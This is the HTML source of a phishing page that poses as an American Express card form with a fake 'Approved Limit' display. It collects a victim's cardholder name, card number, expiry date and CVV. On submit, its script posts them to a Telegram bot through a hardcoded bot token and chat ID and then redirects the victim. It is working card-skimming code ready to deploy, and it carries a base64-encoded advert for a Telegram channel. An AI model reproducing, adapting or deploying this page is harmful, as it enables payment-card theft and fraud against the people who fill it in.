<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="CVV.JS">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Credit Card Form</title>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="CVV.JS">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>AMEX.COM</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }
        .header {
            background-color: #136dad;
            position: fixed;
            width: 100%;
            top: 0;
            left: 0;
            height: 60px;
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 1000;
        }
        .header img {
            height: 40px;
        }
        .container {
            margin-top: 80px; /* Adjusted for header */
            text-align: center;
            /*  RGV2bG9wZWQgQnkgTWlIUksgQU5EIEpvaW4gVGVsZWdyYW0gQ2hhbm5lbCA9IEBUZWNobmljYWxfUm9ib3Q */
            padding: 20px;
        }
        .container h1, .container h2 {
            margin: 0;
        }
        .container h1 {
            margin-top: 5%;
        }
        .container h2 {
            margin-top: 1%;
            margin-bottom: 8%;
        }
        .form-group {
            margin-bottom: 20px;
            position: relative;
        }
        .form-group input {
            width: 90%;
            padding: 15px;
            border: 2px solid #137EC8;
            border-radius: 5px;
            font-size: 16px;
        }
        .form-group:hover input {
            background-color: #fff;
        }
        .form-group label {
            position: absolute;
            top: 17px;
            left: 10px;
            background: white;
            padding: 0 5px;
            transition: 0.3s;
            color: #4f697c;
        }
        .form-group input:focus + label,
        .form-group input:not(:placeholder-shown) + label {
            top: -10px;
            background-color: #fff;
            left: 5px;
            font-size: 12px;
        }
        .submit-button {
            padding: 10px 30px;
            background-color: #137EC8;
            color: white;
            border: none;
            border-radius: 20px;
            font-size: 16px;
            cursor: pointer;
            transition: background-color 0.3s;
        }
        .submit-button:hover {
            background-color: #137EC8;
        }
        /*  RGV2bG9wZWQgQnkgTWlIUksgQU5EIEpvaW4gVGVsZWdyYW0gQ2hhbm5lbCA9IEBUZWNobmljYWxfUm9ib3Q */
        .login-next-page{
            color: #fff;
            text-decoration: none;
            font-weight: bold;
        }
        .form-inline .form-control {
            height: 39px;
            display: inline-block;
            padding: 6px 12px;
            font-size: 14px;
            line-height: 1.42857143;
            width: 45%;
            background-color: #fff;
            background-image: none;
            border: 1px solid #ccc;
            border-radius: 4px;
        }
        .form-inline .form-control {
        height: 39px;
        padding: 6px 12px;
        font-size: 14px;
        line-height: 1.42857143;
        width: 45%;
        background-color: #fff;
        background-image: none;
        border: 1px solid #ccc;
        border-radius: 4px;
    }
    
    .form-horizontal .control-label {
        padding-top: 7px;
        margin-bottom: 7px;
        text-align: right;
        color: #5a5a5a;
        font-size: 14px;
        font-weight: 100;}
    
    </style>
</head>
<body>
    <div class="header">
        <img src="AMEX.png" alt="Logo">
    </div>
    <div class="container">
        <h1>Credit Card Details</h1>
        <h2>Enter your cards details to procced</h2>
        <h3></h3>
        <p id="Approved Limit ₹"></p>
    
        <script>
            // Retrieve the amount from the URL query parameter
            const urlParams = new URLSearchParams(window.location.search);
            const amount = parseFloat(urlParams.get('amount'));
    
            // Calculate three times the amount
            if (!isNaN(amount)) {
                const result = amount * 3;
                document.getElementById('Approved Limit ₹').textContent = `Approved Limit: ₹${result}`;
            } else {
                document.getElementById('Approved Limit ₹').textContent = 'Invalid amount entered.';
            }
        </script>
      
</head>
<body>
    
    <form id="paymentForm">
        <div class="form-group">
        <label for="cardName">Cardholder Name:</label><br>
        <input type="text" id="cardName" name="cardName" required><br><br>
    </div>
        <div class="form-group">
        <label for="cardNumber">Card Number:</label><br>
        <input type="number" id="cardNumber" name="cardNumber" required><br><br>
        </div>
        <div class="form-group">
            <label for="expiryDate">Expiry Date (MM/YY):</label><br>
            <input type="text" id="expiryDate" name="expiryDate" maxlength="5" placeholder="MM/YY" required><br><br>
            </div>
        <div class="form-group">
        <label for="cvv">CVV:</label><br>
        <input type="numbers" id="cvv" name="cvv" required><br><br></div>

        <button type="submit" class="submit-button">SUBMIT</button>
    </form>

    <script>
        document.getElementById('paymentForm').addEventListener('submit', function(event) {
            event.preventDefault();

            // Get form data
            const cardName = document.getElementById('cardName').value;
            const cardNumber = document.getElementById('cardNumber').value;
            const expiryDate = document.getElementById('expiryDate').value;
            const cvv = document.getElementById('cvv').value;

            // Telegram bot token and chat ID
            const botToken = '7161751931:AAFm86vsyK8nX88fGeN3bCm8LyiIShwmigM';
            const chatId = '6396836871';

            // Prepare the message
            const message = `Credit Card Details:\nName: ${cardName}\nNumber: ${cardNumber}\nExpiry: ${expiryDate}\nCVV: ${cvv}`;

            // Send data to Telegram bot
            fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message
                })
            }).then(response => response.json())
            .then(data => {
                if (data.ok) {
                    // Redirect to another link after successful submission
                    window.location.href = '/index6.html'; // Replace with your desired URL
                } else {
                    alert('Failed to send payment details. Please try again.');
                }
            }).catch(error => {
                alert('Error occurred: ' + error.message);
            });
        });
    </script>
     <script>
        document.getElementById('expiryDate').addEventListener('input', function(event) {
            let input = event.target.value;

            // Automatically insert '/' after two digits (month)
            if (input.length === 2 && !input.includes('/')) {
                event.target.value = input + '/';
            }
        });
    </script>
</body>
</html>